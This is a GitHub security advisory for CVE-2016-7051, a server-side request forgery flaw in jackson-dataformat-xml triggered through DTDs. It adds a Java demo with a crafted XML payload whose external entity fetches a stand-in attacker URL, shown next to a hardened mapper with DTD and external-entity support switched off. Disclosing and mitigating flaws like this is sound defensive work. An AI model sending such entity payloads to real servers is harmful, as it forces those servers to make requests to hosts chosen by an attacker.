
jackson-dataformat-xml vulnerable to server side request forgery (SSRF)

High severity GitHub Reviewed Published Oct 18, 2018 to the GitHub Advisory Database • Updated Jan 8, 2023

Package

maven com.fasterxml.jackson.dataformat:jackson-dataformat-xml (Maven)

Affected versions

< 2.7.8
>= 2.8.0, < 2.8.4

Patched versions

2.7.8
2.8.4

Description

Versions of jackson-dataformat-xml prior to 2.7.8, and 2.8.x versions prior to 2.8.4, allow remote attackers to conduct server-side request forgery (SSRF) attacks via vectors related to a DTD. In practice, an attacker-supplied XML document carrying a DOCTYPE that references an external DTD or external entity by URL can cause the parsing server to issue a request to a host the attacker chooses.
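The following is an added example, not code from the advisory or from the Jackson project, showing the DTD-based request primitive beside a hardened mapper configuration. The payload, the `Order` class and the `attacker.invalid` host are constructed for illustration. The mitigation shown (disabling DTD support and external entity resolution on the StAX `XMLInputFactory` that the `XmlMapper` is built from) is a standard StAX-level control and is assumed here as a reasonable hardening; this page does not state the exact change made in the patched releases, and on a patched release the default mapper is expected to reject the document as well.

```java
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLOutputFactory;

import com.fasterxml.jackson.annotation.JsonProperty;
import com.fasterxml.jackson.dataformat.xml.XmlFactory;
import com.fasterxml.jackson.dataformat.xml.XmlMapper;

public class DtdSsrfDemo {

    // Hypothetical target type for the untrusted document.
    public static class Order {
        @JsonProperty("note")
        public String note;
    }

    // Constructed payload: the internal DTD subset declares an external
    // entity whose SYSTEM identifier is a URL. A parser that processes the
    // DTD and resolves external entities fetches that URL from the server,
    // which is the SSRF primitive this advisory describes.
    static final String PAYLOAD =
        "<?xml version=\"1.0\"?>\n"
      + "<!DOCTYPE Order [\n"
      + "  <!ENTITY probe SYSTEM \"http://attacker.invalid/probe\">\n"
      + "]>\n"
      + "<Order><note>&probe;</note></Order>";

    // Vulnerable shape on affected versions: the mapper inherits whatever
    // DTD handling the StAX implementation (typically Woodstox) defaults to.
    static XmlMapper defaultMapper() {
        return new XmlMapper();
    }

    // Hardened shape: build the mapper from a StAX input factory with DTD
    // support and external entity resolution switched off. Assumed
    // mitigation using standard StAX properties, not necessarily the exact
    // upstream patch.
    static XmlMapper hardenedMapper() {
        XMLInputFactory in = XMLInputFactory.newFactory();
        in.setProperty(XMLInputFactory.SUPPORT_DTD, Boolean.FALSE);
        in.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, Boolean.FALSE);
        XMLOutputFactory out = XMLOutputFactory.newFactory();
        return new XmlMapper(new XmlFactory(in, out));
    }

    // Parse the constructed payload and report whether the document was
    // accepted (and what the entity expanded to) or rejected by the parser.
    static String tryParse(String label, XmlMapper mapper) {
        try {
            Order o = mapper.readValue(PAYLOAD, Order.class);
            return label + ": parsed, note=" + o.note;
        } catch (Exception e) {
            return label + ": rejected (" + e.getClass().getSimpleName() + ")";
        }
    }

    public static void main(String[] args) {
        System.out.println(tryParse("default", defaultMapper()));
        System.out.println(tryParse("hardened", hardenedMapper()));
    }
}
```

Run this with the hardened mapper and the document is rejected before any network access, because with `SUPPORT_DTD` off the `&probe;` reference is undeclared and the StAX parser raises an exception; run it with the default mapper on an affected version and the parser attempts to resolve `http://attacker.invalid/probe` from the server. When hardening an application, point the `XMLInputFactory` configuration at every `XmlMapper` the code constructs, since each mapper carries its own factory.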

References

Published to the GitHub Advisory Database Oct 18, 2018
Reviewed Jun 16, 2020
Last updated Jan 8, 2023

Severity

High, 8.6 / 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Changed
Confidentiality
None
Integrity
High
Availability
None
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N

CVE ID

CVE-2016-7051

GHSA ID

GHSA-7c2r-3jqf-c9rw